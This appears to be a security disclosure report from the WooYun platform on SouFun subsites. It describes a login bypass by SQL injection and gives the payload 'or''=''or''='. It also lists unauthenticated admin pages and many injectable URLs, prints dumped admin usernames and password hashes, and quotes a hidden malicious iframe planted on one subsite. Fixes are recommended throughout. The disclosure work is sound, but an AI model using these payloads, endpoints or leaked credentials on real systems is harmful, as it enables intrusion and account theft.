简要描述:搜房网某分站后台管理可绕过验证 详细说明:http://dg.soufun测试数据/market/zhongjie/admin/ 1.登录框SQL注入,可构造查询语句绕过验证,如:'or''=''or''=' 2.未授权访问: http://dg.soufun测试数据/market/zhongjie/admin/news.asp http://dg.soufun测试数据/market/zhongjie/admin/com.asp 3.有页面存在SQL注入,可获取管理员帐号密码 http://dg.soufun测试数据/market/zhongjie/showcom.asp?id=23 漏洞 证明:'or''=''or''='直接登录, 未授权访问: http://dg.soufun测试数据/market/zhongjie/admin/news.asp http://dg.soufun测试数据/market/zhongjie/admin/com.asp SSQL注入:http://dg.soufun测试数据/market/zhongjie/showcom.asp?id=23 修复方案:过滤参数,对未授权访问页面增加验证 此后台应该已经废弃,可以删除 简要描述:搜房网多个页面存在SQL注入 详细说明:多个页面存在SQL注入,有的 数据库 里的内容+多个SQL注入+注入后进的多个后台就值20Rank了。 多个分站,多个页面,多个参数过滤不当导致多个SQL注入,多个数据库里的管理密码未加密 如果一个SQL至少3rank的话,我看可以轻松过50rank。 主站包括分站过50%带有SQL查询语句的ASP程序存在注入,ASPX与PHP比较少。 有的页面已经被嵌入恶意内容。 保守估计网站被入侵的概率约为80%,建议对网站包括分站进行一次大检查删除不需要的垃圾页面和程序。 漏洞证明:http://cq.soufun测试数据/cqfjh/manage/findkfs. asp ?realid=59 http://cq.soufun测试数据/cqfjh/manage/findoneloupan.asp?houseid=65 http://dg.soufun测试数据/market/zhongjie/showcom.asp?id=23 http://suzhou.soufun测试数据/market/lijingyuan/zxdt_xianshi.asp?id=10 http://shdesign.soufun测试数据/mj/shenggao/showitem.asp?id=11 http://shdesign.soufun测试数据/hy/08/jindi01/shownews.asp?id=90 http://esf.sz.soufun测试数据/asp/zhaoping/oneseeker.asp?id=42364 http://nb.soufun测试数据/ad/zzk/zpxx/zp_more.asp?ypid=212 http://changchun.soufun测试数据/market/article/list.asp?articleid=65 http://cs.soufun测试数据/market/eles/news_view.asp?newsid=92 admin HdhCmsTest2cto测试数据 id|pass|user| 1|8370396|changsha_newhouse| http://bj.soufun测试数据/market/yueguizhuangyuan/news/view.asp?id=5 admin id|password|username| 9|27c8f0e73f4d7f48|admin| 11|b3506677e4c55e91|zhang| ... 实在太多了 修复方案:对网站进行一次大检查删除不需要的垃圾页面和程序。 过滤参数 分站http://cs.soufun测试数据/下的多个页面被插入恶意内容,并存在SQL注入 比如:http://cs.soufun测试数据/market/eles/news_view.asp?newsid=92 含有有恶意软件的网站的框架连接 <iframe src="http://HdhCmsTestgzlyqyjt测试数据/inc/" width='0' height='0'></iframe> ... 并且此分站下的多个页面存在SQL注入,包括上面的链接。 漏洞证明:恶意内容: SQL注入: 表:admin 表段:id|pass|user| 数据:1|8*****6|changsha_newhouse| 修复方案:删除不需要的程序,过滤参数,删除恶意代码... 作者 Ambulong@乌云
查看更多关于搜房网某分站后台管理验证绕过及sql注入 - 网站的详细内容...